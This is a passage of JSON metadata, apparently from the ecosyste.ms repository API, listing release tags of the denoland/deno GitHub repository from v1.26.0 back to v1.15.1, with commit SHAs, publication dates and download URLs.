repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHu